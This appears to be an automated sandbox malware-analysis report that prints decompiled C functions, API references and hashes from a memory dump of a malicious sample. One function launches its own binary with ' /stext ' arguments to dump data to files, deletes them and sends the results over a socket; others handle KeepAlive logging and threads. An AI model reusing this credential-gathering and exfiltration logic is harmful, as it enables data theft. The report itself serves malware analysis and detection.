Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: InputSend
String ID:
API String ID: 3431551938-0
Opcode ID: 07469e1e04063f92ccb58a183defdc3ea23f8acf9b0183fccf8db2bcb1f8543c
Instruction ID: 9a5b49cba95b56533d302c830846b850becc2784246b89b1e663d8b5f745be96
Opcode Fuzzy Hash: 07469e1e04063f92ccb58a183defdc3ea23f8acf9b0183fccf8db2bcb1f8543c
Instruction Fuzzy Hash: EC312171D9025CA9FB109BD1CC46FFEBB7CAF18B15F04000AEA04AB1C2D6F995858BE1

Uniqueness

Uniqueness Score: -1.00%

Function 00750305, Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 374
filesleepCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00750305(void* __eflags, void* _a4, char _a28, char _a52, char _a76, char _a100) {
				char _v5;
				char _v6;
				char _v7;
				char _v12;
				char _v36;
				char _v60;
				char _v84;
				char _v108;
				char _v132;
				char _v156;
				char _v180;
				char _v204;
				char _v228;
				char _v252;
				char _v276;
				char _v300;
				char _v324;
				char _v348;
				char _v372;
				char _v396;
				char _v420;
				char _v444;
				char _v468;
				short _v988;
				void* __ebx;
				void* __edi;
				void* _t173;
				void* _t199;
				void* _t225;
				void* _t226;
				void* _t394;
				void* _t399;
				void* _t402;
				void* _t405;

				_t405 = __eflags;
				_v12 = 0;
				GetModuleFileNameW(0,  &_v988, 0x104);
				_v5 = 0;
				_v6 = 0;
				E007420D5(0,  &_v300);
				E007420D5(0,  &_v276);
				E007420D5(0,  &_v252);
				E0075800F( &_v228, 0x30, E00741F95(E00757093( &_v36)));
				E00741FC7();
				E0075800F( &_v204, 0x30, E00741F95(E00757093( &_v36)));
				E00741FC7();
				E0075800F( &_v180, 0x30, E00741F95(E00757093( &_v36)));
				E00741FC7();
				E00741F95( &_a52);
				_t393 = L" /stext \"";
				_t224 = E0075432B(E00741EEB(E007430A6(0,  &_v396, E00744429(0,  &_v420, E00744405(0,  &_v444,  &_v988, _t405, E0074427F(0,  &_v468, L" /stext \"")), _t405,  &_v228), L" /stext \"", _t405, "\"")));
				E00741EF0();
				E00741EF0();
				E00741EF0();
				E00741EF0();
				E00741F95( &_a76);
				_t225 = E0075432B(E00741EEB(E007430A6(_t224,  &_v324, E00744429(_t137,  &_v348, E00744405(_t137,  &_v372,  &_v988, _t405, E0074427F(_t137,  &_v60, _t393)), _t405,  &_v204), _t393, _t405, "\"")));
				E00741EF0();
				E00741EF0();
				E00741EF0();
				E00741EF0();
				E00741F95( &_a100);
				_v7 = E0075432B(E00741EEB(E007430A6(_t225,  &_v84, E00744429(_t225,  &_v108, E00744405(_t225,  &_v132,  &_v988, _t405, E0074427F(_t225,  &_v156, _t393)), _t405,  &_v180), _t393, _t405, "\"")));
				E00741EF0();
				E00741EF0();
				E00741EF0();
				E00741EF0();
				_t399 =  ==  ? 1 : 0;
				if(_t225 == 0) {
					_t399 = _t399 + 1;
				}
				if(_v7 == 0) {
					_t399 = _t399 + 1;
				}
				_t226 = DeleteFileW;
				_t394 = 0;
				L5:
				L5:
				if(E007579DC(E00741EEB( &_v228),  &_v300) != 0) {
					_v12 = 1;
					DeleteFileW(E00741EEB( &_v228));
				}
				if(E007579DC(E00741EEB( &_v204),  &_v276) != 0) {
					_v5 = 1;
					DeleteFileW(E00741EEB( &_v204));
				}
				if(E007579DC(E00741EEB( &_v180),  &_v252) != 0) {
					_v6 = 1;
					DeleteFileW(E00741EEB( &_v180));
				}
				if(_v12 == 0 || _v5 == 0 || _v6 == 0) {
					goto L14;
				}
				L15:
				_t173 = E00745A6F("0");
				_t418 = _t173;
				if(_t173 == 0) {
					E00742F93(_t226, _t402 - 0x18, E00742F93(_t226,  &_v156, E00742F93(_t226,  &_v132, E00742F93(_t226,  &_v108, E00742F93(_t226,  &_v84, E00742FB7( &_v60,  &_a28, 0x7ac238), __eflags,  &_v300), __eflags, 0x7ac238), __eflags,  &_v276), __eflags, 0x7ac238), __eflags,  &_v252);
					_push(0x6a);
					E00744AA4(_t226, 0x7ac650, _t180, __eflags);
					E00741FC7();
					E00741FC7();
					E00741FC7();
					E00741FC7();
				} else {
					_t199 = E00757226(_t226,  &_v324, _t399);
					E00742F1D(_t402 - 0x18, E00742F93(_t226,  &_v156, E00742F93(_t226,  &_v132, E00742F93(_t226,  &_v108, E00742F93(_t226,  &_v84, E00742F93(_t226,  &_v60, E00742F93(_t226,  &_v372, E00742FB7( &_v348,  &_a28, 0x7ac238), _t418,  &_v300), _t418, 0x7ac238), _t418,  &_v276), _t418, 0x7ac238), _t418,  &_v252), _t418, 0x7ac238), _t199);
					_push(0x69);
					E00744AA4(_t226, 0x7ac650, _t207, _t418);
					E00741FC7();
					E00741FC7();
					E00741FC7();
					E00741FC7();
					E00741FC7();
					E00741FC7();
					E00741FC7();
				}
				E00741FC7();
				E00741EF0();
				E00741EF0();
				E00741EF0();
				E00741FC7();
				E00741FC7();
				E00741FC7();
				E00741FC7();
				E00741FC7();
				E00741FC7();
				E00741FC7();
				return E00741FC7();
				L14:
				Sleep(0x1f4);
				_t394 = _t394 + 1;
				if(_t394 < 0xa) {
					goto L5;
				}
				goto L15;
			}

0x00750305
0x00750320
0x00750323
0x0075032f
0x00750332
0x00750335
0x00750340
0x0075034b
0x00750368
0x00750371
0x0075038e
0x00750397
0x007503b4
0x007503bd
0x007503c5
0x007503dd
0x00750428
0x00750430
0x0075043b
0x00750446
0x00750451
0x00750459
0x007504ba
0x007504bc
0x007504c7
0x007504d2
0x007504da
0x007504e2
0x0075053a
0x0075053d
0x00750545
0x0075054d
0x00750558
0x00750566
0x0075056b
0x0075056d
0x0075056d
0x00750571
0x00750573
0x00750573
0x00750574
0x0075057a
0x00000000
0x0075057c
0x00750596
0x0075059e
0x007505a8
0x007505a8
0x007505c4
0x007505cc
0x007505d6
0x007505d6
0x007505f2
0x007505fa
0x00750604
0x00750604
0x0075060a
0x00000000
0x00000000
0x0075062d
0x00750635
0x0075063a
0x0075063c
0x0075078d
0x00750793
0x0075079a
0x007507a5
0x007507ad
0x007507b5
0x007507bd
0x00750642
0x0075064a
0x007506ce
0x007506d4
0x007506db
0x007506e6
0x007506ee
0x007506f6
0x007506fe
0x00750706
0x00750711
0x0075071c
0x00750721
0x007507c5
0x007507d0
0x007507db
0x007507e6
0x007507f1
0x007507fc
0x00750807
0x0075080f
0x00750817
0x0075081f
0x00750827
0x0075083a
0x00750618
0x0075061d
0x00750623
0x00750627
0x00000000
0x00000000
0x00000000

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00750323

Part of subcall function 00757093: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0074417D), ref: 007570BA

Part of subcall function 0075432B: CloseHandle.KERNEL32(007441F6,?,007441F6,0079F464), ref: 00754341
Part of subcall function 0075432B: CloseHandle.KERNEL32(0079F464,?,007441F6,0079F464), ref: 0075434A

DeleteFileW.KERNEL32(00000000,0079F464,0079F464,0079F464), ref: 007505A8
DeleteFileW.KERNEL32(00000000,0079F464,0079F464,0079F464), ref: 007505D6
DeleteFileW.KERNEL32(00000000,0079F464,0079F464,0079F464), ref: 00750604
Sleep.KERNEL32(000001F4,0079F464,0079F464,0079F464), ref: 0075061D

Part of subcall function 00744AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00744B18

Strings

/stext ", xrefs: 007503DD, 007503E3, 0075046F, 007504FB

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: File$Delete$CloseHandle$CurrentModuleNameProcessSleepsend
String ID: /stext "
API String ID: 1351907930-3856184850
Opcode ID: 7951c11d3c007d71d26310aae38384bfcbbac26ad9cbcb440fe640d19ce10db8
Instruction ID: cfbf810b66cc94d4b79a0956b561ac759d108f2162ab7704724fa1d9f8ff9718
Opcode Fuzzy Hash: 7951c11d3c007d71d26310aae38384bfcbbac26ad9cbcb440fe640d19ce10db8
Instruction Fuzzy Hash: BED13031914218DBCB19FB60DC9AAEDB375AF55300F8045A9F40AA7192EF785FCECA50

Uniqueness

Uniqueness Score: -1.00%

Function 00788CA5, Relevance: 10.7, APIs: 7, Instructions: 204
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00788CA5(void* __edx, char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t53;
				void _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				signed int _t64;
				char _t92;
				char _t100;
				void* _t101;
				signed int _t104;
				void* _t107;
				void* _t121;
				char* _t123;
				signed int _t127;
				intOrPtr* _t132;
				void* _t133;
				intOrPtr* _t134;
				signed int _t135;
				signed int _t136;
				signed int _t137;
				signed int _t138;
				char* _t139;

				_t121 = __edx;
				_t100 = _a4;
				_v28 = _t100;
				_v24 = 0;
				if( *((intOrPtr*)(_t100 + 0xb0)) != 0 ||  *((intOrPtr*)(_t100 + 0xac)) != 0) {
					_v16 = 1;
					_t53 = E0077F348(_t101, 1, 0x50);
					_v8 = _t53;
					if(_t53 != 0) {
						_t104 = 0x14;
						memcpy(_t53,  *(_t100 + 0x88), _t104 << 2);
						_t132 = E0077F98C(0, 4);
						_t127 = 0;
						_v12 = _t132;
						E007801F5(0);
						_pop(_t107);
						if(_t132 != 0) {
							 *_t132 = 0;
							if( *((intOrPtr*)(_t100 + 0xb0)) == 0) {
								_t133 = _v8;
								_t57 =  *0x7aa188; // 0x7aa180
								 *_t133 = _t57;
								_t58 =  *0x7aa18c; // 0x7ab64c
								 *((intOrPtr*)(_t133 + 4)) = _t58;
								_t59 =  *0x7aa190; // 0x7ab64c
								 *((intOrPtr*)(_t133 + 8)) = _t59;
								_t60 =  *0x7aa1b8; // 0x7aa184
								 *((intOrPtr*)(_t133 + 0x30)) = _t60;
								_t61 =  *0x7aa1bc; // 0x7ab650
								 *((intOrPtr*)(_t133 + 0x34)) = _t61;
								L19:
								 *_v12 = 1;
								if(_t127 != 0) {
									 *_t127 = 1;
								}
								goto L21;
							}
							_t134 = E0077F98C(_t107, 4);
							_v20 = _t134;
							E007801F5(0);
							if(_t134 == 0) {
								L11:
								E007801F5(_v8);
								E007801F5(_v12);
								return _v16;
							}
							 *_t134 = 0;
							_t128 =  *((intOrPtr*)(_t100 + 0xb0));
							_t135 = E0078B0F4(_t100, _t121,  *((intOrPtr*)(_t100 + 0xb0)), _t134,  &_v28, 1,  *((intOrPtr*)(_t100 + 0xb0)), 0xe, _v8);
							_t136 = _t135 | E0078B0F4(_t100, _t121,  *((intOrPtr*)(_t100 + 0xb0)), _t135,  &_v28, 1, _t128, 0xf, _v8 + 4);
							_v16 = _v8 + 8;
							_t137 = _t136 | E0078B0F4(_t100, _t121, _t128, _t136,  &_v28, 1, _t128, 0x10, _v8 + 8);
							_t138 = _t137 | E0078B0F4(_t100, _t121, _t128, _t137,  &_v28, 2, _t128, 0xe, _v8 + 0x30);
							if((E0078B0F4(_t100, _t121, _t128, _t138,  &_v28, 2, _t128, 0xf, _v8 + 0x34) | _t138) == 0) {
								_t123 =  *_v16;
								while( *_t123 != 0) {
									_t92 =  *_t123;
									if(_t92 < 0x30 || _t92 > 0x39) {
										if(_t92 != 0x3b) {
											goto L16;
										}
										_t139 = _t123;
										do {
											 *_t139 =  *((intOrPtr*)(_t139 + 1));
											_t139 = _t139 + 1;
										} while ( *_t139 != 0);
									} else {
										 *_t123 = _t92 - 0x30;
										L16:
										_t123 = _t123 + 1;
									}
								}
								_t127 = _v20;
								_t133 = _v8;
								goto L19;
							}
							E00788C3C(_v8);
							_v16 = _v16 | 0xffffffff;
							goto L11;
						}
						E007801F5(_v8);
						return 1;
					}
					return 1;
				} else {
					_t127 = 0;
					_v12 = 0;
					_t133 = 0x7aa188;
					L21:
					_t64 =  *(_t100 + 0x80);
					if(_t64 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t100 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t64 | 0xffffffff) == 0) {
							E007801F5( *((intOrPtr*)(_t100 + 0x7c)));
							E007801F5( *(_t100 + 0x88));
						}
					}
					 *((intOrPtr*)(_t100 + 0x7c)) = _v12;
					 *(_t100 + 0x80) = _t127;
					 *(_t100 + 0x88) = _t133;
					return 0;
				}
			}

0x00788ca5
0x00788cae
0x00788cb5
0x00788cb8
0x00788cc1
0x00788ce0
0x00788ce3
0x00788ce8
0x00788cef
0x00788d02
0x00788d03
0x00788d0c
0x00788d0e
0x00788d11
0x00788d14
0x00788d1a
0x00788d1d
0x00788d30
0x00788d38
0x00788e92
0x00788e95
0x00788e9a
0x00788e9c
0x00788ea1
0x00788ea4
0x00788ea9
0x00788eac
0x00788eb1
0x00788eb4
0x00788eb9
0x00788e22
0x00788e28
0x00788e2c
0x00788e2e
0x00788e2e
0x00000000
0x00788e2c
0x00788d45
0x00788d48
0x00788d4b
0x00788d54
0x00788de9
0x00788dec
0x00788df5
0x00000000
0x00788dfe
0x00788d5d
0x00788d62
0x00788d76
0x00788d8a
0x00788d96
0x00788da4
0x00788dbe
0x00788dda
0x00788e04
0x00788e17
0x00788e08
0x00788e0c
0x00788e7f
0x00000000
0x00000000
0x00788e81
0x00788e83
0x00788e86
0x00788e88
0x00788e8b
0x00788e12
0x00788e14
0x00788e16
0x00788e16
0x00788e16
0x00788e0c
0x00788e1c
0x00788e1f
0x00000000
0x00788e1f
0x00788ddf
0x00788de4
0x00000000
0x00788de8
0x00788d22
0x00000000
0x00788d2a
0x00000000
0x00788ccb
0x00788ccb
0x00788ccd
0x00788cd0
0x00788e30
0x00788e30
0x00788e38
0x00788e3a
0x00788e3a
0x00788e42
0x00788e47
0x00788e4b
0x00788e50
0x00788e5b
0x00788e61
0x00788e4b
0x00788e65
0x00788e6a
0x00788e70
0x00000000
0x00788e70

APIs

_free.LIBCMT ref: 00788D14
_free.LIBCMT ref: 00788D22
_free.LIBCMT ref: 00788E50
_free.LIBCMT ref: 00788E5B

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 99b4a4b946344c1b1268f0e55d16b0fb061ff4886bbd53ed8e29850688c7d560
Instruction ID: 663b0d8799d02a647b7ac965a1c72a7883aa8d42aa42b12641650dfa05d24cd3
Opcode Fuzzy Hash: 99b4a4b946344c1b1268f0e55d16b0fb061ff4886bbd53ed8e29850688c7d560
Instruction Fuzzy Hash: 6E611871D80205EFDB60EF68C845BAEBBF4EF49720F504069E954EB281EB74AD41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00782E63, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 171
timeCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00782E63(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				signed int _v56;
				char _v268;
				intOrPtr _v272;
				char _v276;
				char _v312;
				char _v316;
				void* __ebp;
				void* _t36;
				signed int _t38;
				signed int _t42;
				signed int _t50;
				void* _t54;
				void* _t56;
				signed int* _t61;
				intOrPtr _t71;
				void* _t78;
				signed int _t85;
				signed int _t87;
				signed int _t89;
				int _t93;
				char** _t96;
				signed int _t100;
				signed int _t101;
				signed int _t106;
				signed int _t107;
				intOrPtr _t116;
				intOrPtr _t118;

				_t88 = __edi;
				_t96 = E007828CD();
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_t36 = E0078292B( &_v8);
				_pop(_t78);
				if(_t36 != 0) {
					L19:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E0077698A();
					asm("int3");
					_t106 = _t107;
					_t38 =  *0x7aa00c; // 0x67a7e35e
					_v56 = _t38 ^ _t106;
					 *0x7aa344 =  *0x7aa344 | 0xffffffff;
					 *0x7aa338 =  *0x7aa338 | 0xffffffff;
					_push(0);
					_push(_t96);
					_t77 = "TZ";
					_t89 = 0;
					 *0x7ab748 = 0;
					_t42 = E00779895(__eflags,  &_v316,  &_v312, 0x100, "TZ");
					__eflags = _t42;
					if(_t42 != 0) {
						__eflags = _t42 - 0x22;
						if(_t42 == 0x22) {
							_t101 = E0077F98C(_t78, _v272);
							__eflags = _t101;
							if(__eflags != 0) {
								_t50 = E00779895(__eflags,  &_v276, _t101, _v272, _t77);
								__eflags = _t50;
								if(_t50 == 0) {
									E007801F5(0);
									_t89 = _t101;
								} else {
									_push(_t101);
									goto L25;
								}
							} else {
								_push(0);
								L25:
								E007801F5();
							}
						}
					} else {
						_t89 =  &_v268;
					}
					asm("sbb esi, esi");
					_t100 =  ~(_t89 -  &_v268) & _t89;
					__eflags = _t89;
					if(__eflags == 0) {
						L33:
						E00782E63(_t77, _t89, _t100, __eflags);
					} else {
						__eflags =  *_t89;
						if(__eflags == 0) {
							goto L33;
						} else {
							_push(_t89);
							E00782C8E(_t77, _t89, _t100, __eflags);
						}
					}
					E007801F5(_t100);
					__eflags = _v12 ^ _t106;
					return E0076FD1B(_v12 ^ _t106);
				} else {
					_t54 = E007828D3( &_v12);
					_pop(_t78);
					if(_t54 != 0) {
						goto L19;
					} else {
						_t56 = E007828FF( &_v16);
						_pop(_t78);
						if(_t56 != 0) {
							goto L19;
						} else {
							E007801F5( *0x7ab740);
							 *0x7ab740 = 0;
							 *_t107 = 0x7ab750;
							if(GetTimeZoneInformation(??) != 0xffffffff) {
								_t85 =  *0x7ab750 * 0x3c;
								_t87 =  *0x7ab7a4; // 0x0
								_push(__edi);
								 *0x7ab748 = 1;
								_v8 = _t85;
								_t116 =  *0x7ab796; // 0x0
								if(_t116 != 0) {
									_v8 = _t85 + _t87 * 0x3c;
								}
								_t118 =  *0x7ab7ea; // 0x0
								if(_t118 == 0) {
									L9:
									_v12 = 0;
									_v16 = 0;
								} else {
									_t71 =  *0x7ab7f8; // 0x0
									if(_t71 == 0) {
										goto L9;
									} else {
										_v12 = 1;
										_v16 = (_t71 - _t87) * 0x3c;
									}
								}
								_t93 = E0077F55B(0, _t87);
								if(WideCharToMultiByte(_t93, 0, 0x7ab754, 0xffffffff,  *_t96, 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *( *_t96) = 0;
								} else {
									( *_t96)[0x3f] = 0;
								}
								if(WideCharToMultiByte(_t93, 0, 0x7ab7a8, 0xffffffff, _t96[1], 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *(_t96[1]) = 0;
								} else {
									_t96[1][0x3f] = 0;
								}
							}
							 *(E007828C7()) = _v8;
							 *(E007828BB()) = _v12;
							_t61 = E007828C1();
							 *_t61 = _v16;
							return _t61;
						}
					}
				}
			}

0x00782e63
0x00782e72
0x00782e79
0x00782e7d
0x00782e80
0x00782e83
0x00782e88
0x00782e8b
0x00782fb3
0x00782fb3
0x00782fb4
0x00782fb5
0x00782fb6
0x00782fb7
0x00782fb8
0x00782fbd
0x00782fc1
0x00782fc9
0x00782fd0
0x00782fd3
0x00782fe0
0x00782fe7
0x00782fe8
0x00782fea
0x00782fef
0x00782ffe
0x00783005
0x0078300d
0x0078300f
0x00783019
0x0078301c
0x00783029
0x0078302c
0x0078302e
0x00783047
0x0078304f
0x00783051
0x00783057
0x0078305c
0x00783053
0x00783053
0x00000000
0x00783053
0x00783030
0x00783030
0x00783031
0x00783031
0x00783031
0x0078305e
0x00783011
0x00783011
0x00783011
0x0078306b
0x0078306d
0x0078306f
0x00783071
0x00783081
0x00783081
0x00783073
0x00783073
0x00783076
0x00000000
0x00783078
0x00783078
0x00783079
0x0078307e
0x00783076
0x00783087
0x00783092
0x0078309d
0x00782e91
0x00782e95
0x00782e9a
0x00782e9d
0x00000000
0x00782ea3
0x00782ea7
0x00782eac
0x00782eaf
0x00000000
0x00782eb5
0x00782ebb
0x00782ec0
0x00782ec6
0x00782ed6
0x00782edc
0x00782ee3
0x00782ee9
0x00782eed
0x00782ef3
0x00782ef6
0x00782efd
0x00782f04
0x00782f04
0x00782f07
0x00782f0e
0x00782f26
0x00782f26
0x00782f29
0x00782f10
0x00782f10
0x00782f17
0x00000000
0x00782f19
0x00782f1b
0x00782f21
0x00782f21
0x00782f17
0x00782f31
0x00782f4d
0x00782f5d
0x00782f54
0x00782f56
0x00782f56
0x00782f7b
0x00782f8d
0x00782f82
0x00782f85
0x00782f85
0x00782f7b
0x00782f97
0x00782fa1
0x00782fa6
0x00782fab
0x00782fb2
0x00782fb2
0x00782eaf
0x00782e9d

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0079913C), ref: 00782ECD
WideCharToMultiByte.KERNEL32(00000000,00000000,007AB754,000000FF,00000000,0000003F,00000000,?,?), ref: 00782F45
WideCharToMultiByte.KERNEL32(00000000,00000000,007AB7A8,000000FF,?,0000003F,00000000,?), ref: 00782F72
_free.LIBCMT ref: 00782EBB

Part of subcall function 007801F5: HeapFree.KERNEL32(00000000,00000000,?,00788EEF,?,00000000,?,00000000,?,00789193,?,00000007,?,?,007896DE,?), ref: 0078020B
Part of subcall function 007801F5: GetLastError.KERNEL32(?,?,00788EEF,?,00000000,?,00000000,?,00789193,?,00000007,?,?,007896DE,?,?), ref: 0078021D

_free.LIBCMT ref: 00783087

Strings

~0x, xrefs: 00782CD4, 00782D58, 00782D72, 00782D9E, 00782DC5, 00782DEA, 00782E22, 00782E6C

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID: ~0x
API String ID: 1286116820-548819893
Opcode ID: f6d5d5ca5696d76562c9d0a12dc72ada18a7aa740cc74ed90183dd24e20dc136
Instruction ID: fafdb63fa0b6e86ea04e213d32056270a19bf137990fe5a889b1363ca16558c9
Opcode Fuzzy Hash: f6d5d5ca5696d76562c9d0a12dc72ada18a7aa740cc74ed90183dd24e20dc136
Instruction Fuzzy Hash: 5D51D871D40209EFCB10FF68DC859BEB7BCEF81761B10426AE514A7192EB789E42CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00744FAD, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 112
timeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00744FAD(void* __edi, intOrPtr _a4) {
				struct _SYSTEMTIME _v24;
				char _v48;
				char _v72;
				void* __ebx;
				intOrPtr _t85;
				void* _t86;
				void* _t92;

				_t84 = __edi;
				if( *0x7ac7d0 == 0) {
					__eflags = 0;
					return 0;
				}
				_t85 = _a4;
				if( *0x7abb03 == 0) {
					L7:
					 *0x7ac7e0 =  *0x7ac7e0 & 0x00000000;
					 *0x7ac7e5 = 1;
					 *0x7ac7dc = _t85;
					return 1;
				}
				_t91 =  *0x7ac7e4;
				_t62 = "%02i:%02i:%02i:%03i [Info] ";
				if( *0x7ac7e4 != 0) {
					GetLocalTime( &_v24);
					_push(_v24.wMilliseconds & 0x0000ffff);
					_push(_v24.wSecond & 0x0000ffff);
					_push(_v24.wMinute & 0x0000ffff);
					E0074482E(_t91, E00741F95(E00745343(_t62,  &_v48, E00742084("%02i:%02i:%02i:%03i [Info] ",  &_v72, _t62), __edi, _t91, "Connection KeepAlive enabled\n")), _v24.wHour & 0x0000ffff);
					E00741FC7();
					E00741FC7();
					_push(_t85);
					_push(_v24.wMilliseconds & 0x0000ffff);
					_push(_v24.wSecond & 0x0000ffff);
					_push(_v24.wMinute & 0x0000ffff);
					E0074482E(_t91, E00741F95(E00745343(_t62,  &_v72, E00742084(_t62,  &_v48, _t62), __edi, _t91, "Connection KeepAlive timeout: %i\n")), _v24.wHour & 0x0000ffff);
					_t86 = _t86 + 0x2c;
					E00741FC7();
					E00741FC7();
					 *0x7ac7e4 = 0;
				}
				_t92 =  *0x7ac7dc - _t85; // 0x0
				if(_t92 != 0) {
					_t93 =  *0x7ac7e5;
					if( *0x7ac7e5 != 0) {
						GetLocalTime( &_v24);
						_push(_t85);
						_push(_v24.wMilliseconds & 0x0000ffff);
						_push(_v24.wSecond & 0x0000ffff);
						_push(_v24.wMinute & 0x0000ffff);
						E0074482E(_t93, E00741F95(E00745343(_t62,  &_v72, E00742084(_t62,  &_v48, _t62), _t84, _t93, "KeepAlive timeout changed to %i\n")), _v24.wHour & 0x0000ffff);
						E00741FC7();
						E00741FC7();
					}
				}
				goto L7;
			}

0x00744fad
0x00744fbc
0x00745111
0x00000000
0x00745111
0x00744fc9
0x00744fcc
0x007450f9
0x007450f9
0x00745102
0x00745109
0x00000000
0x00745109
0x00744fd2
0x00744fd9
0x00744fde
0x00744fe8
0x00744ff5
0x00744ffa
0x00744fff
0x00745023
0x0074502e
0x00745036
0x00745042
0x00745043
0x00745048
0x0074504d
0x00745071
0x00745076
0x0074507c
0x00745084
0x00745089
0x00745089
0x00745090
0x00745096
0x00745098
0x0074509f
0x007450a5
0x007450b2
0x007450b3
0x007450b8
0x007450bd
0x007450e1
0x007450ec
0x007450f4
0x007450f4
0x0074509f
0x00000000

APIs

GetLocalTime.KERNEL32(?), ref: 00744FE8
GetLocalTime.KERNEL32(?), ref: 007450A5

Strings

KeepAlive timeout changed to %i, xrefs: 007450C3
%02i:%02i:%02i:%03i [Info] , xrefs: 00744FD9, 0074500A, 00745058, 007450C8
Connection KeepAlive timeout: %i, xrefs: 00745053
Connection KeepAlive enabled, xrefs: 00745005

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: LocalTime
String ID: %02i:%02i:%02i:%03i [Info] $Connection KeepAlive enabled$Connection KeepAlive timeout: %i$KeepAlive timeout changed to %i
API String ID: 481472006-2341810981
Opcode ID: c385bb1d0960d36e16f3ac942fdc47f1dd8edc20a27d0e8d284e53cfeb8dd528
Instruction ID: e7d3e957f500ebaf18118955854596f5b160d7b9ffbaf1909dd56484fd23f31b
Opcode Fuzzy Hash: c385bb1d0960d36e16f3ac942fdc47f1dd8edc20a27d0e8d284e53cfeb8dd528
Instruction Fuzzy Hash: 684195A2C01258FACF15FBB5DC09AFEB7BCAB0A304F404456F441E6092EB3C5A85D764

Uniqueness

Uniqueness Score: -1.00%

Function 00744E9A, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 96
timethreadCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00744E9A(void* __ecx, intOrPtr _a4, char _a8) {
				struct _SYSTEMTIME _v20;
				char _v44;
				char _v68;
				void* __ebx;
				void* __edi;
				intOrPtr _t66;
				void* _t68;

				_t68 = __ecx;
				if( *((char*)(__ecx + 0x50)) != 0) {
					__eflags = 0;
					return 0;
				}
				_t66 = _a4;
				if(_a8 != 0) {
					__eflags =  *0x7abb03;
					if(__eflags != 0) {
						GetLocalTime( &_v20);
						_push(_v20.wMilliseconds & 0x0000ffff);
						_t50 = "%02i:%02i:%02i:%03i [Info] ";
						_push(_v20.wSecond & 0x0000ffff);
						_push(_v20.wMinute & 0x0000ffff);
						E0074482E(__eflags, E00741F95(E00745343(_t50,  &_v44, E00742084("%02i:%02i:%02i:%03i [Info] ",  &_v68, _t50), _t66, __eflags, "Connection KeepAlive enabled\n")), _v20.wHour & 0x0000ffff);
						E00741FC7();
						E00741FC7();
						_push(_t66);
						_push(_v20.wMilliseconds & 0x0000ffff);
						_push(_v20.wSecond & 0x0000ffff);
						_push(_v20.wMinute & 0x0000ffff);
						E0074482E(__eflags, E00741F95(E00745343(_t50,  &_v68, E00742084(_t50,  &_v44, _t50), _t66, __eflags, "Connection KeepAlive timeout: %i\n")), _v20.wHour & 0x0000ffff);
						E00741FC7();
						E00741FC7();
					}
				} else {
					 *((char*)(__ecx + 0x64)) = 1;
				}
				 *((intOrPtr*)(_t68 + 0x5c)) = _t66;
				 *((char*)(_t68 + 0x50)) = 1;
				 *((intOrPtr*)(_t68 + 0x54)) = CreateEventA(0, 0, 0, 0);
				CreateThread(0, 0, E0074518A, _t68, 0, 0);
				return 1;
			}

0x00744ea2
0x00744ea9
0x00744fa2
0x00000000
0x00744fa2
0x00744eb3
0x00744eb6
0x00744ec1
0x00744ec8
0x00744ed2
0x00744edf
0x00744ee4
0x00744ee9
0x00744eee
0x00744f12
0x00744f1d
0x00744f25
0x00744f31
0x00744f32
0x00744f37
0x00744f3c
0x00744f60
0x00744f6b
0x00744f73
0x00744f73
0x00744eb8
0x00744eb8
0x00744eb8
0x00744f78
0x00744f81
0x00744f95
0x00744f98
0x00000000

APIs

GetLocalTime.KERNEL32(?), ref: 00744ED2
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00744F85
CreateThread.KERNEL32 ref: 00744F98

Strings

%02i:%02i:%02i:%03i [Info] , xrefs: 00744EE4, 00744EF9, 00744F47
Connection KeepAlive timeout: %i, xrefs: 00744F42
Connection KeepAlive enabled, xrefs: 00744EF4

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Create$EventLocalThreadTime
